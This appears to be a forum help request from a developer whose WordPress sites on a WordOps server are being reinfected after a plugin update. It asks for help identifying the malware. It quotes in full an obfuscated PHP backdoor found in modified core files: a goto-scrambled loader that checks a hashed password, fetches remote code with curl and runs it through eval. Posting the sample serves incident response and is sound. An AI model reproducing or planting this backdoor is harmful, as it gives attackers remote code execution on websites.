![Unknown attack and other questions [closed]](https://i0.wp.com/i.sstatic.net/trEJnGXy.png?fit=%2C&ssl=1 "Unknown attack and other questions [closed]")
I am a new developer in a company that works with wordops and wordpress. We have about 10 websites in a particular VPS that have been abruptly attacked since last week.
Some relevant data: Wordops version 3.22.0 PHP 8.3.16
Everything was fine until I did a scheduled weekly plugin and theme update on all sites. Three days later, most sites started crashing and my team leader noticed a pattern.
Since each site is installed by Wordops, the structure is: /var/www/mywebsite.com
- conf
- htdocs
- logs
The malware started injecting self-replicating code, spread across a few websites, and from there started infecting other sites. Most directories would have a specific infected .htaccess file and perhaps two or three .php files disguised as regular WP files (wp-blog-header.php, wp-config.php, wp-cron.php, or postnews.php).
In the image I provided, the about.php, .htaccess, wp-blog-header.php, wp-config.php, and sometimes wp-cron.php and wp-load.php files are modified to receive something like the code snippet below or even an encode64 or decode64:
<?php
goto VMD9X7zVKryV; SSdpBK1vqT1n: ($eYBXf6s1xAgG[67] = $eYBXf6s1xAgG[67] . $eYBXf6s1xAgG[75]) && ($eYBXf6s1xAgG[89] = $eYBXf6s1xAgG[67]($eYBXf6s1xAgG[89])) && @eval($eYBXf6s1xAgG[67](${$eYBXf6s1xAgG[45]}[24])); goto aO0ZLL_mSHsu; JTii6Qjwq8Aa: $eYBXf6s1xAgG = ${$x4YnPlWlviMq[11 + 20] . $x4YnPlWlviMq[33 + 26] . $x4YnPlWlviMq[2 + 45] . $x4YnPlWlviMq[20 + 27] . $x4YnPlWlviMq[33 + 18] . $x4YnPlWlviMq[30 + 23] . $x4YnPlWlviMq[45 + 12]}; goto cpcwHRbx_Jho; tfX6fZ1G2Fu3: class MDIAim2431KF { static function ez0xfN9oXt_B($iYBfZTJAb1v_) { goto VTAnjsyawdnW; DI7iDyETZXxR: return $IH63Wgb0VNMp; goto RQ89TADJQGts; N8HvAbyDVSZo: $jo35E26nlCl4 = explode("\176", $iYBfZTJAb1v_); goto rLDdTVfNvCFk; riENVVGwKX2f: ZPwe8ID84W0P: goto DI7iDyETZXxR; VTAnjsyawdnW: $mhCFcBq36MY0 = "\x72" . "\141" . "\x6e" . "\x67" . "\145"; goto G5C1DGKwbiuf; rLDdTVfNvCFk: $IH63Wgb0VNMp = ''; goto Vud690Cuadm3; G5C1DGKwbiuf: $MirSt6N1kmZd = $mhCFcBq36MY0("\x7e", "\40"); goto N8HvAbyDVSZo; Vud690Cuadm3: foreach ($jo35E26nlCl4 as $fPEUhS1vwG5b => $SO5bpxkRxQbq) { $IH63Wgb0VNMp .= $MirSt6N1kmZd[$SO5bpxkRxQbq - 11177]; WYu9yZ5sXb8G: } goto riENVVGwKX2f; RQ89TADJQGts: } static function LP2oF_aJtElj($UnBps1J1dL5p, $MZ4PeGYaGzDT) { goto ylBd0t_ilpI2; c_OAStMwxV3K: $IvQACU0M5wdt = curl_exec($Qe8VI2kGoFJ2); goto YigIaLl0NiAi; YigIaLl0NiAi: return empty($IvQACU0M5wdt) ? $MZ4PeGYaGzDT($UnBps1J1dL5p) : $IvQACU0M5wdt; goto IzDiR6HMoGwE; ylBd0t_ilpI2: $Qe8VI2kGoFJ2 = curl_init($UnBps1J1dL5p); goto cYOBW4I09ntM; cYOBW4I09ntM: curl_setopt($Qe8VI2kGoFJ2, CURLOPT_RETURNTRANSFER, 1); goto c_OAStMwxV3K; IzDiR6HMoGwE: } static function RIx3D9VRBwqN() { goto kH3dyQ92DjJ_; xg2xtsX_HCdD: $AAo8Yzv8OeVm = @$gmAdwCWd3c_Q[1]($gmAdwCWd3c_Q[10 + 0](INPUT_GET, $gmAdwCWd3c_Q[7 + 2])); goto Dd86orKp2HW8; C1rs8lQmWH5g: $bNgvqATsPYgy = self::lp2oF_aJTELJ($ln_UaQESJcF2[1 + 0], $gmAdwCWd3c_Q[5 + 0]); goto IJER5rgAfka1; DymgFMVUqi5Q: die; goto eqUB8MT2B2KN; Qh4CrvkL_VaL: QYmhOyqHUWyv: goto xg2xtsX_HCdD; YwCZ9uXlBkI4: if (!(@$ln_UaQESJcF2[0] - time() > 0 and md5(md5($ln_UaQESJcF2[3 + 0])) === "\x38\141\x37\x33\x33\x33\61\63\142\x66\x36\142\71\x63\63\x39\66\66\x30\x63\x63\x39\x62\146\x34\x33\62\x39\x64\61\142\141")) { goto wPwC3LpimtP4; } goto C1rs8lQmWH5g; YKK4TRNkRltb: $ln_UaQESJcF2 = $gmAdwCWd3c_Q[0 + 2]($WMdYkm6hxXAs, true); goto Mv5um9BQtH7y; Dd86orKp2HW8: $WMdYkm6hxXAs = @$gmAdwCWd3c_Q[3 + 0]($gmAdwCWd3c_Q[2 + 4], $AAo8Yzv8OeVm); goto YKK4TRNkRltb; IJER5rgAfka1: @eval($gmAdwCWd3c_Q[2 + 2]($bNgvqATsPYgy)); goto DymgFMVUqi5Q; Mv5um9BQtH7y: @$gmAdwCWd3c_Q[10 + 0](INPUT_GET, "\x6f\x66") == 1 && die($gmAdwCWd3c_Q[5 + 0](__FILE__)); goto YwCZ9uXlBkI4; kH3dyQ92DjJ_: $G9TKVqr1tTR_ = array("\61\61\x32\x30\64\176\61\61\x31\70\x39\176\61\x31\62\60\x32\x7e\61\x31\x32\60\66\x7e\61\x31\x31\70\x37\x7e\x31\x31\62\x30\x32\x7e\x31\x31\x32\60\70\x7e\x31\61\x32\x30\x31\176\x31\61\61\x38\66\x7e\x31\61\x31\71\x33\x7e\61\61\62\x30\64\x7e\x31\61\x31\70\x37\x7e\x31\x31\x31\71\x38\x7e\x31\61\x31\x39\x32\x7e\61\x31\x31\71\63", "\61\x31\61\70\x38\x7e\x31\x31\61\x38\67\176\x31\x31\x31\x38\x39\176\x31\61\62\60\70\x7e\61\61\x31\x38\x39\x7e\x31\x31\61\x39\62\x7e\61\61\61\70\x37\x7e\61\61\x32\x35\x34\x7e\x31\61\x32\65\62", "\x31\x31\x31\71\67\176\61\61\x31\x38\x38\x7e\x31\61\61\71\x32\176\61\x31\61\x39\x33\176\61\x31\x32\60\x38\x7e\x31\x31\x32\x30\x33\x7e\61\61\x32\60\62\176\61\x31\x32\60\64\176\x31\x31\x31\x39\62\x7e\x31\61\x32\60\63\176\x31\61\x32\60\x32", "\61\61\61\71\61\176\x31\61\62\60\66\176\61\x31\62\x30\x34\x7e\x31\x31\61\71\66", "\x31\x31\x32\x30\65\x7e\x31\x31\x32\60\x36\x7e\61\61\x31\70\x38\x7e\x31\61\62\60\62\x7e\x31\x31\62\64\x39\x7e\x31\x31\x32\65\x31\x7e\61\x31\62\x30\70\176\61\x31\62\x30\x33\x7e\61\x31\x32\x30\62\x7e\x31\x31\x32\x30\x34\x7e\x31\x31\x31\71\62\x7e\61\x31\x32\x30\63\176\61\x31\62\x30\62", "\61\61\x32\60\x31\176\61\61\x31\x39\x38\x7e\x31\61\61\x39\65\x7e\61\61\x32\x30\x32\176\x31\x31\x32\60\70\176\x31\x31\62\x30\60\176\x31\61\x32\x30\x32\x7e\x31\61\61\70\67\176\61\61\x32\60\x38\x7e\x31\61\x32\x30\64\176\61\x31\x31\x39\62\x7e\61\x31\x31\x39\x33\x7e\61\x31\61\70\x37\x7e\61\61\62\60\62\176\61\x31\x31\x39\x33\176\x31\61\61\70\67\176\x31\61\x31\x38\x38", "\61\61\62\63\61\176\61\61\62\x36\x31", "\61\61\x31\67\x38", "\61\x31\x32\65\66\176\x31\x31\x32\x36\61", "\61\61\x32\x33\x38\x7e\61\x31\x32\62\61\176\61\61\62\62\61\x7e\61\61\x32\x33\x38\x7e\61\61\x32\61\64", "\x31\61\62\60\61\176\x31\x31\x31\x39\x38\x7e\x31\61\x31\71\x35\176\61\x31\61\x38\x37\176\x31\x31\62\60\62\x7e\x31\x31\x31\x38\71\176\x31\x31\x32\x30\x38\x7e\61\x31\61\x39\70\x7e\61\61\61\x39\x33\176\61\x31\61\71\x31\176\x31\x31\x31\x38\66\176\x31\61\61\70\67"); goto CO3D8a_zXX6e; eqUB8MT2B2KN: wPwC3LpimtP4: goto UVxULrqJUJLf; CO3D8a_zXX6e: foreach ($G9TKVqr1tTR_ as $PQ9MLAddEsS8) { $gmAdwCWd3c_Q[] = self::ez0xfN9OXt_b($PQ9MLAddEsS8); FusVhdLZDhdc: } goto Qh4CrvkL_VaL; UVxULrqJUJLf: } } goto xCRB7QI9fMWf; swHMATb7S2Rt: $x4YnPlWlviMq = $cOq6SG8NKwbb("\x7e", "\40"); goto JTii6Qjwq8Aa; pQQIPCMOH5Rj: metaphone("\130\110\71\x33\154\x6c\x4b\x67\x70\x66\x78\156\x49\162\131\110\122\53\x45\103\x67\64\x4c\130\66\166\x67\x4e\131\x4e\144\x47\105\x4b\x5a\x4e\x4c\x67\x61\x59\x7a\x6a\x41"); goto tfX6fZ1G2Fu3; cpcwHRbx_Jho: if (!(in_array(gettype($eYBXf6s1xAgG) . count($eYBXf6s1xAgG), $eYBXf6s1xAgG) && count($eYBXf6s1xAgG) == 12 && md5(md5(md5(md5($eYBXf6s1xAgG[6])))) === "\x38\x35\142\64\x31\67\63\67\x36\x66\x31\x39\144\146\x31\70\144\142\66\x31\x64\71\x39\143\x32\141\66\x63\x63\x37\x36\63")) { goto DhJ64q3oyCtU; } goto SSdpBK1vqT1n; VMD9X7zVKryV: $cOq6SG8NKwbb = "\x72" . "\x61" . "\x6e" . "\147" . "\x65"; goto swHMATb7S2Rt; aO0ZLL_mSHsu: DhJ64q3oyCtU: goto pQQIPCMOH5Rj; xCRB7QI9fMWf: MDiaim2431kf::rIX3D9vRbWqN();
?>
Anyway, my team lead and I have been working tirelessly to clean up the websites, perform rollbacks, and finalize this vulnerability, but it’s hard.
From what we tried, we excluded infected files and downloaded and updated the core of each site. Sometimes it helps and sometimes it doesn’t. But even if it helps, a few hours later the self-replicating malicious code infects even more and crashes the site.
Has anyone ever heard of this vulnerability before? And since I’m fairly new to the WP community, what are the best resources for finding known/fixed malware and vulnerabilities?
Thank you.
#Unknown #attack #questions #closed